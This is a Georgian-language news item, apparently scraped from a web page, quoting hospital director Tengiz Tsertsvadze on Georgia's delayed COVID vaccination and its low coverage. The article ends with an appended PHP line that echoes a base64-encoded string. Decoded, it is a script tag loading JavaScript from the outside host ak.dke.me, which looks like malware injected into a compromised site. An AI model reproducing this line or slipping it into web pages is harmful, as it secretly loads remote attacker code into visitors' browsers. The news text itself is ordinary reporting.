celsiusi
ავერსი საქკაბელი
ინფექციური საავადმყოფოს დირექტორის, თენგიზ ცერცვაძის განცხადებით, საქართველოში ვაქცინაციამ დაიგვიანა.
 
როგორც ცერცვაძე აღნიშნავს, ვაქცინაციის ნიშნული დაბალია.
 
"ერთადერთი სუსტი რგოლი, რაშიც მართალი ხართ თქვენც, მართალი არიან ჩვენი ყველაზე დაუნდობელი ოპონენტებიც კი, რომლებიც ხშირად არასწორად აკრიტიკებენ ექიმებს და ხელმძღვანელობას, არის ის, რომ ვაქცინამ დაიგვიანა, არ მინდა სიტყვა ჩავარდნა ვიხმარო, მაგრამ ვაქცინამ დაიგვიანა, ნიშნული დაბალია. ეს არის საქართველოს ყველაზე სუსტი ადგილი კოვიდსაწინააღმდეგო სამსახურისა. რატომ მოხდა, ეს ძალიან შორს წაგვიყვანს, ბევრი ფაქტორია, ერთ-ერთი ფაქტორია, დეკემბერ-იანვარში როცა ჩინური ვაქცინა იყო გამზადებული შემოსატანად, მაშინ საზოგადოებას ჰქონდა მწვავე პროტესტი და მთავრობას ჩინური ვაქცინა არ შემოატანინეს, "ფაიზერი" და "ასტრაზენეკა" მაშინ ვერ იშოვა მთავრობამ, ამიტომ დაგვიანდა. მეზობელმა თურქეთმა და აზერბაიჯანმა მაშინვე დაიწყეს ჩინური ვაქცინა და დღეს ჩვენზე ბევრად უკეთ არიან", - აცხადებს ცერცვაძე.
 
კითხვაზე, ხომ არ განაპირობა ინფიცირებულთა რაოდენობის ზრდა დაგვიანებულმა ვაქცინაციამ, ცერცვაძე პასუხობს, რომ "გარკვეულწილად ალბათ კი, მაგრამ მაინც და მაინც არ უმოქმედია".
 
"ვაქცინაცია არ იცავს საიმედოდ ახალი შემთხვევებისგან.... აცრა ძალიან საჭიროა, ინგლისი, ესპანეთი, საფრანგეთი, ისრაელი ჩვენზე გაცილებით აცრილები არიან, მაგრამ ჩვენზე არანაკლები ავადმყოფი ჰყავთ, სამაგიეროდ, სიკვდილობა აქვთ ბევრად ნაკლები",- განაცხადა ცერცვაძემ.
1070
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");